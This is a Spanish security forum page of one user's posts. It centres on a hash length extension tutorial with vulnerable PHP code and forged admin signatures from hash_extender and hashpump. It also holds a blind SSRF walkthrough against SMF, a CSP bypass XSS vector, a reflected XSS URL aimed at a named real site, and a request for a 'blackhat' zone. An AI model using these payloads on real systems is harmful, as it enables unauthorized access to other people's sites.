Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - arthusu

Páginas: [1] 2 3 ... 29
1
Shells / Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
« en: Marzo 11, 2019, 12:48:29 am »
Buen dia amigos,

Alguien podría explicarme un poco como funciona el backdoor

Citar
2. include() - Requiere: allow_url_fopen.

estoy intentando ver como funciona tal como esta en el post, pero me queda la pantalla en blanco (no muestra nada), muy agradecido de antemano.

Saludos a todos

necesitas tener activado  allow_url_fopen en el archivo php.ini pones: allow_url_fopen = on, saludos

2
Reparaciones / Re:Desbloqueo definitivo netbook del Gobierno
« en: Enero 15, 2019, 02:41:42 am »
el metodo para flasheo de bios es el mismo que este, la primera vez que lo hice como no soy muy bueno soldando este tipo de componentes les recomiendo aire caliente es lo mejor, saludos

3
Pentesting / Ataque de extension de longitud
« en: Enero 15, 2019, 01:34:51 am »
¿Que es?

En criptografía y seguridad informática, un ataque de extensión de longitud es un tipo de ataque en el que un atacante puede usar el hash y la longitud del mensaje, para calcular el hash de un mensaje controlado por el atacante.

Código de ejemplo:

Código: PHP
  1. <?php
  2.        
  3.         $secret = md5('arthusu');
  4.  
  5.         if(isset($_GET['user']))
  6.         {
  7.                 echo md5($secret . ':user');
  8.                 exit;
  9.         }
  10.  
  11.         if(isset($_GET['admin']))
  12.         {
  13.                 echo md5($secret . ':admin');
  14.         }
  15.  
  16.         $signature = md5($secret . ':' . $_GET['type']);
  17.  
  18.         if($signature == $_GET['sig'])
  19.         {
  20.                 $data = explode(':', $_GET['type']);
  21.  
  22.                 if(end($data) == 'admin')
  23.                 {
  24.                         echo 'Tu eres administrador';
  25.                 }
  26.                 else
  27.                 {
  28.                         echo 'Tu eres un usuario';
  29.                 }
  30.         }
  31.         else
  32.         {
  33.                 echo 'Firma invalida';
  34.         }
  35.  
  36. ?>



Uso:


?user - pedimos la firma para el usuario



?admin - pedimos la firma para el administrador


?sig=xxxx&type=user – donde sig es la firma obtenida y el type el tipo de usuario



En caso de que la palabra no coincida con la firma generada nos va mostrar un mensage un mensaje de error.



 ?sig=xxx&type=admin – nos muestra el usuario administrador

Explotación

Haremos uso de un script:

https://github.com/bwall/HashPump

https://github.com/iagox86/hash_extender


Hash extender en este caso soporta los siguientes hashes para su explotación:

CRC32, MD5, SHA1, SHA256 y SHA512

Ahora identificamos el hash https://www.onlinehashcrack.com/hash-identification.php

Introducimos el hash: 38f7e2f0c5eba427ed6b4b47f24814ea (en mi caso es este) y 0/GetImage%2B%25286%2529.png[/img]

Generamos una nueva firma

arthusu@SEGINF-RED03:/mnt/c/users/jaesoto/hash_extender$ ./hash_extender -f md5 -s 38f7e2f0c5eba427ed6b4b47f24814ea  --data 'user' --append ':admin' --secret-min=7 --secret-max=33 --out-data-format=html

Código: Text
  1.  
  2. Type: md5
  3.  
  4. Secret length: 7
  5.  
  6. New signature: 12005b20185a5b3feb166cf9017ffa56
  7.  
  8. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00%3aadmin
  9.  
  10.  
  11.  
  12. Type: md5
  13.  
  14. Secret length: 8
  15.  
  16. New signature: 12005b20185a5b3feb166cf9017ffa56
  17.  
  18. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%00%00%00%00%00%00%00%3aadmin
  19.  
  20.  
  21.  
  22. Type: md5
  23.  
  24. Secret length: 9
  25.  
  26. New signature: 12005b20185a5b3feb166cf9017ffa56
  27.  
  28. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00h%00%00%00%00%00%00%00%3aadmin
  29.  
  30.  
  31.  
  32. Type: md5
  33.  
  34. Secret length: 10
  35.  
  36. New signature: 12005b20185a5b3feb166cf9017ffa56
  37.  
  38. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00p%00%00%00%00%00%00%00%3aadmin
  39.  
  40.  
  41.  
  42. Type: md5
  43.  
  44. Secret length: 11
  45.  
  46. New signature: 12005b20185a5b3feb166cf9017ffa56
  47.  
  48. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00x%00%00%00%00%00%00%00%3aadmin
  49.  
  50.  
  51.  
  52. Type: md5
  53.  
  54. Secret length: 12
  55.  
  56. New signature: 12005b20185a5b3feb166cf9017ffa56
  57.  
  58. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00%3aadmin
  59.  
  60.  
  61.  
  62. Type: md5
  63.  
  64. Secret length: 13
  65.  
  66. New signature: 12005b20185a5b3feb166cf9017ffa56
  67.  
  68. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%88%00%00%00%00%00%00%00%3aadmin
  69.  
  70.  
  71.  
  72. Type: md5
  73.  
  74. Secret length: 14
  75.  
  76. New signature: 12005b20185a5b3feb166cf9017ffa56
  77.  
  78. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00%3aadmin
  79.  
  80.  
  81.  
  82. Type: md5
  83.  
  84. Secret length: 15
  85.  
  86. New signature: 12005b20185a5b3feb166cf9017ffa56
  87.  
  88. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%98%00%00%00%00%00%00%00%3aadmin
  89.  
  90.  
  91.  
  92. Type: md5
  93.  
  94. Secret length: 16
  95.  
  96. New signature: 12005b20185a5b3feb166cf9017ffa56
  97.  
  98. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a0%00%00%00%00%00%00%00%3aadmin
  99.  
  100.  
  101.  
  102. Type: md5
  103.  
  104. Secret length: 17
  105.  
  106. New signature: 12005b20185a5b3feb166cf9017ffa56
  107.  
  108. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a8%00%00%00%00%00%00%00%3aadmin
  109.  
  110.  
  111.  
  112. Type: md5
  113.  
  114. Secret length: 18
  115.  
  116. New signature: 12005b20185a5b3feb166cf9017ffa56
  117.  
  118. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b0%00%00%00%00%00%00%00%3aadmin
  119.  
  120.  
  121.  
  122. Type: md5
  123.  
  124. Secret length: 19
  125.  
  126. New signature: 12005b20185a5b3feb166cf9017ffa56
  127.  
  128. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00%3aadmin
  129.  
  130.  
  131.  
  132. Type: md5
  133.  
  134. Secret length: 20
  135.  
  136. New signature: 12005b20185a5b3feb166cf9017ffa56
  137.  
  138. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00%3aadmin
  139.  
  140.  
  141.  
  142. Type: md5
  143.  
  144. Secret length: 21
  145.  
  146. New signature: 12005b20185a5b3feb166cf9017ffa56
  147.  
  148. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00%3aadmin
  149.  
  150.  
  151.  
  152. Type: md5
  153.  
  154. Secret length: 22
  155.  
  156. New signature: 12005b20185a5b3feb166cf9017ffa56
  157.  
  158. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d0%00%00%00%00%00%00%00%3aadmin
  159.  
  160.  
  161.  
  162. Type: md5
  163.  
  164. Secret length: 23
  165.  
  166. New signature: 12005b20185a5b3feb166cf9017ffa56
  167.  
  168. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d8%00%00%00%00%00%00%00%3aadmin
  169.  
  170.  
  171.  
  172. Type: md5
  173.  
  174. Secret length: 24
  175.  
  176. New signature: 12005b20185a5b3feb166cf9017ffa56
  177.  
  178. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00%3aadmin
  179.  
  180.  
  181.  
  182. Type: md5
  183.  
  184. Secret length: 25
  185.  
  186. New signature: 12005b20185a5b3feb166cf9017ffa56
  187.  
  188. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%00%00%00%00%00%00%00%3aadmin
  189.  
  190.  
  191.  
  192. Type: md5
  193.  
  194. Secret length: 26
  195.  
  196. New signature: 12005b20185a5b3feb166cf9017ffa56
  197.  
  198. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00%3aadmin
  199.  
  200.  
  201.  
  202. Type: md5
  203.  
  204. Secret length: 27
  205.  
  206. New signature: 12005b20185a5b3feb166cf9017ffa56
  207.  
  208. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f8%00%00%00%00%00%00%00%3aadmin
  209.  
  210.  
  211.  
  212. Type: md5
  213.  
  214. Secret length: 28
  215.  
  216. New signature: 12005b20185a5b3feb166cf9017ffa56
  217.  
  218. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00%3aadmin
  219.  
  220.  
  221.  
  222. Type: md5
  223.  
  224. Secret length: 29
  225.  
  226. New signature: 12005b20185a5b3feb166cf9017ffa56
  227.  
  228. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%08%01%00%00%00%00%00%00%3aadmin
  229.  
  230.  
  231.  
  232. Type: md5
  233.  
  234. Secret length: 30
  235.  
  236. New signature: 12005b20185a5b3feb166cf9017ffa56
  237.  
  238. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%10%01%00%00%00%00%00%00%3aadmin
  239.  
  240.  
  241.  
  242. Type: md5
  243.  
  244. Secret length: 31
  245.  
  246. New signature: 12005b20185a5b3feb166cf9017ffa56
  247.  
  248. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%01%00%00%00%00%00%00%3aadmin
  249.  
  250.  
  251.  
  252. Type: md5
  253.  
  254. Secret length: 32
  255.  
  256. New signature: 12005b20185a5b3feb166cf9017ffa56
  257.  
  258. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00+%01%00%00%00%00%00%00%3aadmin
  259.  
  260.  
  261.  
  262. Type: md5
  263.  
  264. Secret length: 33
  265.  
  266. New signature: 12005b20185a5b3feb166cf9017ffa56
  267.  
  268. New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%28%01%00%00%00%00%00%00%3aadmin
  269.  

Donde los parámetros son los siguientes:

-f xxx le indicamos el tipo de hash

-s xxxx le indicamos la firma que tenemos valida

--data 'xxx' le indicamos el dato conocido en este caso user

--append 'xxx' le indicamos el dato que queremos agregarle en este caso :admin con dos puntos por el explode en este caso 

--out-data-format=xxx le indicamos el formato de salida que le va dar

--secret-min=numero le indicamos un numero de tamaño para el secreto como minimo

--secret-max=numero le indicamos un numero de tamaño para el secreto como maximo



El secreto es en lo que se basa este ataque el tamaño del mismo como en este caso hipotéticamente no sabemos su tamaño (aunque si sabemos que la $signature tiene 32 caracteres el tamaño 😉 ) entonces generamos un rango en este caso del 7 al 33 y comenzamos a probar... 1 por 1.



Para realizar la prueba con hashpump lo hacemos de la siguiente manera:


arthusu@SEGINF-RED03:~$ hashpump

Código: Text
  1. Input Signature: 38f7e2f0c5eba427ed6b4b47f24814ea
  2.  
  3. Input Data: :user
  4.  
  5. Input Key Length: 32
  6.  
  7. Input Data to Add: :admin
  8.  
  9. 12005b20185a5b3feb166cf9017ffa56
  10.  
  11. :user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin
  12.  

Como vemos ingresamos la firma con la comenzamos 38f7e2f0c5eba427ed6b4b47f24814ea

Después el dato con el que comenzamos user

Y el tamaño de la firma en este caso 32

Por ultimo el input agregar es :admin el cual esta en un explode por eso : sino fuera el caso no se agrega



Nos da una nueva firma: 12005b20185a5b3feb166cf9017ffa56

Y un payload: :user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin



El cual transformamos \x a % quedando asi: 


user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00(%01%00%00%00%00%00%00:admin

Al ejecutar el payload nos da el resultado correcto.


Conclusión:


Estas vulnerabilidades existen realmente en las aplicaciones web, un ejemplo claro de ello lo podemos encontrar en: https://hackerone.com/reports/251572

Dudas y sugerencias pueden comentar, saludos

Referencia: https://arthusu.blogspot.com/2019/01/ataque-de-extension-de-longitud_14.html

4
Dudas y pedidos generales / Re:patrones actuales para INFINITUMxxxx ??
« en: Diciembre 04, 2018, 10:53:09 pm »
en los modem telmex hay unos que puedes obtener la contraseña con mac2wepkey, sino es asi los patrones que puedes usar la mayoria de los modem telmex utilizan 0-9 y de la A-F de 10 digitos, saludos!

5
antes que nada buen post Gabriela, hay que darle uso a las otras opciones que trae son mas utiles:

-d dominio o palabra <- aqui indicas el dominio o la palabra a buscar por ejemplo: -d underc0de o -d underc0de.org
-b motor <- puedes indicar la lista de motores de busqueda pasiva: baidu, bing, bingapi, crtsh, dogpile, google, google-certificates, googleCSE, googleplus, google-profiles, hunterio, linkedin, netcraft, pgp, threatcrowd,twitter, vhost, virustotal, yahoo, all
- f resultado.html <- guarda el archivo en resultado.html

esas son las opciones basicas y que siempre deben usarse, pero si quieres ir mas adentro y utilizar las nuevas funciones que incluye puedes utilizar:

-v <- busca host virtuales
-n <- reverse dns
-c <- realiza brute force a los dns encontrando mas subdominios
-t <- hace una busqueda tld a los dominios ejemplo: underc0de.org lo buscaria: underc0de.net, underc0de.edu, etc
-p <- hace una escaneo de puertos en 80,443,8080 esto es util ya que tambien con esta nueva opcion detectas la toma de un subdominio
-h <- utilizas busquedas en shodan este es de manera pasiva.

Ahora un ejemplo:

Código: [Seleccionar]
python3 theHarvester.py -d underc0de.org -b virustotal -c 

Tambien puedes agregar apis como por ejemplo hunter tiene una buena recoleccion de emails:



y utilizar hunter como motor

6
Hacking ShowOff / [Blind SSRF] Underc0de.org y SMF 2.1
« en: Octubre 27, 2018, 08:03:29 pm »
Anteriormente hice un post sobre este ataque en un blog de un amigo, les dejo el enlace para que le peguen una leída.

https://www.sie-group.net/hoja/1p8gy57w-cross_site_port_attack__xspa.html

En la pagina oficial de github de SMF viene el siguiente código:



lo que hace aquí es que parsea la url luego manda a pedir por una funcion llamada fetch_web_data()



viendo el código vemos que valida si la url es http, https o ftp.



En caso de que sea http abre socket y realiza la petición. Ok hasta aquí no veo que blacklistee o tenga una whitelist de puertos, o solo servidores de imágenes aceptadas, por lo cual puedes poner cualquier URL sera aceptada.

Con esto comenzaremos el ataque, abriré burp collaborator client:



Copiare la URL que me genera, y la pondré en la parte de ataque que es donde ponemos la URL.



le podemos indicar el puerto en este caso el puerto 80.

Verificamos en burp collaborator que la petición se realiza correctamente, podemos darle poll now para un refresco.



Ahora haremos el Poc, verificamos puertos abiertos de la pagina nmap con nmapxD:



ok sabiendo esto podemos realizar la petición usando Burp Repeater:



Aquí sabemos que el puerto esta abierto por que la respuesta fue 302 found y tardo poco tiempo en responder



Aqui sabemos que el puerto esta cerrado por que la respuesta fue 302 found y tardo mucho tiempo en responder

Tambien existe otro caso en el cual un puerto esta abierto pero tarda mucho en responder y esto pasa por que la coneccion sigue viva:



y termina dando un resultado sin respuesta:



Esto seria todo, creo que se pueden realizar mas cosas pero no estoy seguro, un ataque Dos por ejemplo dejando sockets abiertos o pidiendo un string muy lardo, en este caso no pude ver nada de la red interna por que no se ve reflejado en el body como tal la respuesta. Si alguien tiene alguna idea de como explotar esta vulnerabilidad en este caso mas a fondo que me la haga saber o si me equivoco tambien, saludos

7
pueden checar las nuevas adquisiciones desde https://www.crunchbase.com/, saludos

8
no es por des meritar el post, de hecho no he usado la herramienta pero verificando un poco el codigo mire esto:



el de facebook hace simplemente una peticion post por cada lista que meta la verdad no se a los cuantos intentos te bloquee facebook, viendo el codigo te bloqueara en unos pocos intentos.



el de gmail esta igual ataca por smtp, pero no estoy seguro tengo ya tiempo que no pruebo, pero cuando probe con hydra hace tiempo me bloqueaba por smtp gmail.

los otros dos por lo que veo usan tor por lo cual pueden durar un poco mas en los intentos.

9
Dudas y pedidos generales / Re:¿Rastrear Num. telefónico ?
« en: Octubre 23, 2018, 02:22:40 am »
haz lo que dice Gabriela igual existe una aplicación en android que se llama true caller id puedes identificar algunos numeros que algunos usuarios ya han reportado como spam, saludos

10
Dudas y pedidos generales / Re:Duda existencial
« en: Octubre 05, 2018, 12:23:25 am »
practica no hay nada mejor que practicarlo de esa manera sabrás si te gusta en verdad

11
Hacking ShowOff / Re:Xss graciosos no persistentes
« en: Octubre 01, 2018, 08:45:01 pm »
se llama XSS reflejado y si tiene XSS bro lo que tu estas ejecutando se llama HTML Injection

Aqui un ejemplo del XSS:
https://login.discoveryeducation.com/?welcome=1&ErrMsg=%3Cbody%20onload=%22alert(1)%22%3E

No es por desmeritar tu post la verdad me parecen muy buenos tus post, sigue asi!.

12
Pentesting / Usando Burp con TOR
« en: Septiembre 30, 2018, 12:50:22 pm »
Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.


1.- descargamos TOR: https://www.torproject.org/
2.- abrimos el navegador de tor vamos a opciones>proxy de red>Configuración... Verificamos el HOST SOCK en mi caso esta así: IP: 127.0.0.1 PUERTO: 9150



3.- ahora abro mozilla firefox e ingreso lo siguiente:



4.- Me dirijo a Burp>User options>SOCKS Proxy>Ingreso proxy:
IP: 127.0.0.1 PORT: 9150

Seleccionamos la opción: Use SOCKS Proxy y tambien Do DNS Lookups over Sock Proxy.

 

5.- Ingreso a Mi firefox y hago peticiones por ejemplo https://www.cual-es-mi-ip.net/:

 

13
Pentesting / Como saltar CSP (Content Security Policy)
« en: Septiembre 30, 2018, 12:47:32 pm »
Introduccion

La política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de código malicioso en el contexto confiable de la pagina web.

Detectando CSP

 


Primeramente vemos una URL que puede ser posiblemente atacada por XSS. Y hacemos la prueba:

 


Vemos como se inyecta nuestro codigo pero no se ejecuta entonces, vamos al apartado de Network de nuestro inspeccionador de elementos y vemos lo siguiente:

 

Un mensaje de error que nos indica claramente como content security police nos esta bloqueando y que solo permite ejecutar scripts del mismo dominio.

Atacar!

El siguiente paso es buscar alguna parte donde se refleje nuestro XSS ya sea un alert, prompt, confirm, etc... puede llegar a ser una imagen, un archivo js, etc...

Primero hay que ver cuales son los dominios que permite para ello vamos hacemos una peticion y vemos la respuesta:




Vemos claramente como se puede solamente inyectar script que sean del mismo dominio. Ejemplo de un vector:

Código: [Seleccionar]
<script src="http://pentesterlab.com/arthusublog.js?var=alert(1);" />
Donde alert(1) se refleja en el JS.

 


Inyectando el vector en donde se encuentra el XSS podemos realizar el bypass:

 

14
Back-end / Selenium Automatizando el navegador PHP-WebDriver by Facebook
« en: Septiembre 30, 2018, 12:44:00 pm »
¿Que es Selenium?

Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero ciertamente no se limita a eso. Las tareas de administracion aburridas basadas en la web pueden (y deberian) ser automatizadas tambien.

Selenium tiene el soporte de algunos de los proveedores mas grandes de navegadores que han tomado (o están tomando) pasos para hacer de Selenium una parte nativa de su navegador. También es la tecnología central en muchas otras herramientas de automatización del navegador, API y frameworks.

¿Que parte de Selenium es apropiada para mi?

Selenium Web Driver

Si quieres:
* Cree robustos paquetes y pruebas de automatizacion de regresion basados en el navegador
* Escalar y distribuir scripts en muchos entornos

Selenium IDE

Si quieres:
* Crear scripts rapidos de reproduccion de errores
* Crear scripts para ayudar en las pruebas exploratorias asistidas por la automatizacion.

Descargar Selenium

Puedes dirigirte a la pagina web de Selenium y en la seccion Download: https://www.seleniumhq.org/download/

Puedes elegir la que mas se adapte a tu proyecto ya sea selenium ide o selenium web driver. En este minitutorial mostraremos algo basico de los dos.


Selenium IDE

En caso de que quieras que sea solamente una accion en especifica siempre la misma accion te recomendaria usar Selenium IDE. El cual se encuentra disponible para firefox y chrome en version complemento, yo utilizare para firefox en este caso:
https://addons.mozilla.org/en-US/firefox/addon/selenium-ide/

En el siguiente vídeo veremos como en Selenium entramos a la pagina de mi BLOG, después entramos a una publicación y después volvemos a la pagina inicial, esto es algo básico ya que con Selenium podemos meter datos en un campo, y muchas cosas mas que normalmente podemos hacer manualmente con el navegador.




También puedes exportar tu código a diferentes partes y hacer mas rápido una ejecución.

Selenium Web Driver

¿Que diferencia hay entre Selenium IDE y Selenium Web Driver?

La mayor diferencia es que con Selenium IDE grabamos las cosas y las reproducimos, pero si quieres que algo sea dinamico y con interaccion debes utilizar programacion y con Selenium Web Driver lo puedes lograr.

Lo primero que debemos realizar es descargarnos el driver de nuestra preferencia se encuentra dentro de la misma pagina oficial de selenium, en mi caso seguire usando firefox:

https://github.com/mozilla/geckodriver/releases

Hay que agregar el driver a variables de entorno.

Y usare tambien el server standalone de selenium en este caso yo utilizare la version 3.8.1:

http://selenium-release.storage.googleapis.com/index.html

Utilizare el driver de PHP creado por facebook:

https://github.com/facebook/php-webdriver

Lo primero a realizar es correr mi server standalone de selenium:



Código: [Seleccionar]
java -jar selenium-server-standalone-3.8.1.jar -enablePassThrough false
Por ultimo podemos correr nuestro proyecto usando la consola o desde web, no explicare el uso del driver ya que facebook tiene una gran wiki aqui: https://github.com/facebook/php-webdriver/wiki



Por ultimo decirles que con Selenium tenemos una herramienta poderosa para automatizacion de tareas y podriamos hacer cosas grandiosas con el. Un ejemplo:




Por esta introduccion seria todo y les invito a probar Selenium en sus proyectos de automatizacion.[/font]

15
Dudas y pedidos generales / Re:ayuda con Ngrok kali linux
« en: Septiembre 16, 2018, 11:48:54 am »
Usa otro puerto como 8080, para ver si ese que estas creando no esta siendo usado que es lo mas probable por otra aplicación.

16
Dudas y pedidos generales / Re:Hackthebox
« en: Septiembre 03, 2018, 05:58:42 pm »
escanear? ::)

17
Dudas y pedidos generales / Re:Duda sobre telefono con APK infectada
« en: Septiembre 03, 2018, 03:17:30 pm »
lo recomendable es que guarde sus datos y realice un hard reset a su celular, si desea puede analizar el apk de sus aplicaciones con apktool descompilandola y con dex2jar, o analizándola con virustotal o  alguna aplicación de código estático para que confirmes tus sospechas, saludos

18
Dudas y pedidos generales / [SOLUCIONADO] Cursos underc0de y zona vip?
« en: Agosto 27, 2018, 11:09:29 pm »
Hola buenas buenas tiempo sin revisar el foro y estaba viendo que algún contenido todavía es bueno, aunque hay muchos usuarios nuevos que ya no he visto por aquí, quería preguntar sobre una url que encontré creando una herramienta de búsqueda de subdominios, encontré:

http://cursos.underc0de.org/

y quería saber para cuando esta este proyecto por lanzarse y si serán cursos de pago o normales y si me puedo unir....

y sobre la zona vip quería ver si tenían alguna zona vip donde podamos compartir contenido blackhat, se que el foro es ético y en eso estamos pero una zona vip que no muchas vean y que pueda ser de pago ayudaría al foro y también al staff a publicar mas cosas de interés a todos, no hice una búsqueda antes pero quería ver que opinan sobre esto, saludos

19
buen post bro gracias por mantenernos informados yo no tenia idea del phishing enviando pdf es buena idea, salu2

20
estan muy bien tus post son procesos que se deben realizar siempre al comenzar un pentest, saludos buen post

Páginas: [1] 2 3 ... 29